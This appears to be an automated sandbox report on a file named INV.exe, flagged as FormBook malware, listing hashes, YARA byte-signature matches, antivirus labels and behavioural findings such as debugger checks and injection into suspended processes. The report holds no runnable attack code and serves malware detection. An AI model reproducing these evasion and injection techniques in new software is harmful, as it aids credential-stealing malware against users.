Play interactive tour

Edit tour

Analysis Report INV.exe

Overview

General Information

Sample Name:	INV.exe
Analysis ID:	323458
MD5:	83259cb82642666503278233421c306d
SHA1:	180e81bab341eda0d404b8f5fed93bc3b350cfbd
SHA256:	6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
Tags:	exe
Most interesting Screenshot:

Detection

FormBook

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries disk information (often used to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores large binary data to the registry

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

INV.exe (PID: 6580 cmdline: 'C:\Users\user\Desktop\INV.exe' MD5: 83259CB82642666503278233421C306D)

conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

INV.exe (PID: 6640 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)

WerFault.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1ac18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ae92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x269b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x264a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x26ab7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x26c2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1b8aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2571c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c5a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2c827:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2d82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x29749:$sqlite3step: 68 34 1C 7B E1 0x2985c:$sqlite3step: 68 34 1C 7B E1 0x29778:$sqlite3text: 68 38 2A 90 C5 0x2989d:$sqlite3text: 68 38 2A 90 C5 0x2978b:$sqlite3blob: 68 53 D8 7F 8C 0x298b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9050:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x92ca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14ded:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x148d9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14eef:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15067:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9ce2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13b54:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa9db:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ac5f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc62:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17b81:$sqlite3step: 68 34 1C 7B E1 0x17c94:$sqlite3step: 68 34 1C 7B E1 0x17bb0:$sqlite3text: 68 38 2A 90 C5 0x17cd5:$sqlite3text: 68 38 2A 90 C5 0x17bc3:$sqlite3blob: 68 53 D8 7F 8C 0x17ceb:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9e18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa092:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15bb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x156a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15cb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15e2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaaaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1491c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb7a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ba27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18949:$sqlite3step: 68 34 1C 7B E1 0x18a5c:$sqlite3step: 68 34 1C 7B E1 0x18978:$sqlite3text: 68 38 2A 90 C5 0x18a9d:$sqlite3text: 68 38 2A 90 C5 0x1898b:$sqlite3blob: 68 53 D8 7F 8C 0x18ab3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2d471:$sqlite3step: 68 34 1C 7B E1 0x2d584:$sqlite3step: 68 34 1C 7B E1 0x2d4a0:$sqlite3text: 68 38 2A 90 C5 0x2d5c5:$sqlite3text: 68 38 2A 90 C5 0x2d4b3:$sqlite3blob: 68 53 D8 7F 8C 0x2d5db:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.INV.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INV.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INV.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2d471:$sqlite3step: 68 34 1C 7B E1 0x2d584:$sqlite3step: 68 34 1C 7B E1 0x2d4a0:$sqlite3text: 68 38 2A 90 C5 0x2d5c5:$sqlite3text: 68 38 2A 90 C5 0x2d4b3:$sqlite3blob: 68 53 D8 7F 8C 0x2d5db:$sqlite3blob: 68 53 D8 7F 8C
2.2.INV.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.INV.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1ad40:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1afba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x26add:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x265c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x26bdf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x26d57:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1b9d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x25844:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c6cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2c94f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2d952:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.INV.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x29871:$sqlite3step: 68 34 1C 7B E1 0x29984:$sqlite3step: 68 34 1C 7B E1 0x298a0:$sqlite3text: 68 38 2A 90 C5 0x299c5:$sqlite3text: 68 38 2A 90 C5 0x298b3:$sqlite3blob: 68 53 D8 7F 8C 0x299db:$sqlite3blob: 68 53 D8 7F 8C
0.2.INV.exe.90000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.INV.exe.90000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x3ac18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3ae92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x469b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x464a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x46ab7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x46c2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3b8aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x4571c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x3c5a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x4c827:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4d82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.INV.exe.90000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x49749:$sqlite3step: 68 34 1C 7B E1 0x4985c:$sqlite3step: 68 34 1C 7B E1 0x49778:$sqlite3text: 68 38 2A 90 C5 0x4989d:$sqlite3text: 68 38 2A 90 C5 0x4978b:$sqlite3blob: 68 53 D8 7F 8C 0x498b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: INV.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: INV.exe

Virustotal: Detection: 36%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: INV.exe

Joe Sandbox ML: detected

Source: 2.2.INV.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.INV.exe.90000.0.unpack	Avira: Label: TR/Crypt.EPACK.Gen2
Source: 2.0.INV.exe.90000.0.unpack	Avira: Label: ADWARE/MultiPlug.Gen7
Source: 0.0.INV.exe.90000.0.unpack	Avira: Label: ADWARE/MultiPlug.Gen7
Source: 2.2.INV.exe.90000.0.unpack	Avira: Label: ADWARE/MultiPlug.Gen7

Source: C:\Users\user\Desktop\INV.exe

Code function: 2_2_00404A29 FindFirstFileExW,

2_2_00404A29

Source: C:\Users\user\Desktop\INV.exe

Code function: 4x nop then pop ebx

0_2_000C9E2B

Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_00091BC7	0_2_00091BC7
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C50B7	0_2_000C50B7
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C50C0	0_2_000C50C0
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_0009B0E6	0_2_0009B0E6
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000CC16C	0_2_000CC16C
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000CC170	0_2_000CC170
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C52E0	0_2_000C52E0
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000C3360	0_2_000C3360
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A4399	0_2_000A4399
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_0009B4FE	0_2_0009B4FE
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A1521	0_2_000A1521
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000BA57D	0_2_000BA57D
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A27AF	0_2_000A27AF
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_0009B933	0_2_0009B933
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A59B4	0_2_000A59B4
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A1A93	0_2_000A1A93
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000E0AC0	0_2_000E0AC0
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A3AD7	0_2_000A3AD7
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_0009ABF2	0_2_0009ABF2
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_00099D44	0_2_00099D44
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_0009BD68	0_2_0009BD68
Source: C:\Users\user\Desktop\INV.exe	Code function: 0_2_000A0FB6	0_2_000A0FB6
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0009B0E6	2_2_0009B0E6
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0009B4FE	2_2_0009B4FE
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A1521	2_2_000A1521
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0009B933	2_2_0009B933
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00099D44	2_2_00099D44
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0009BD68	2_2_0009BD68
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A59B4	2_2_000A59B4
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A1A93	2_2_000A1A93
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A3AD7	2_2_000A3AD7
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A4399	2_2_000A4399
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A27AF	2_2_000A27AF
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_000A0FB6	2_2_000A0FB6
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_00091BC7	2_2_00091BC7
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0009ABF2	2_2_0009ABF2
Source: C:\Users\user\Desktop\INV.exe	Code function: 2_2_0040A2A5	2_2_0040A2A5

Source: C:\Users\user\Desktop\INV.exe	Code function: String function: 000932A1 appears 54 times
Source: C:\Users\user\Desktop\INV.exe	Code function: String function: 000927F0 appears 60 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872

Source: INV.exe, 00000000.00000003.644161326.0000000002526000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
Source: INV.exe, 00000002.00000002.668878228.0000000004D50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs INV.exe
Source: INV.exe, 00000002.00000002.668934607.0000000004DC0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INV.exe

Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: phoneinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: ext-ms-win-xblauth-console-l1.dll	Jump to behavior

Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
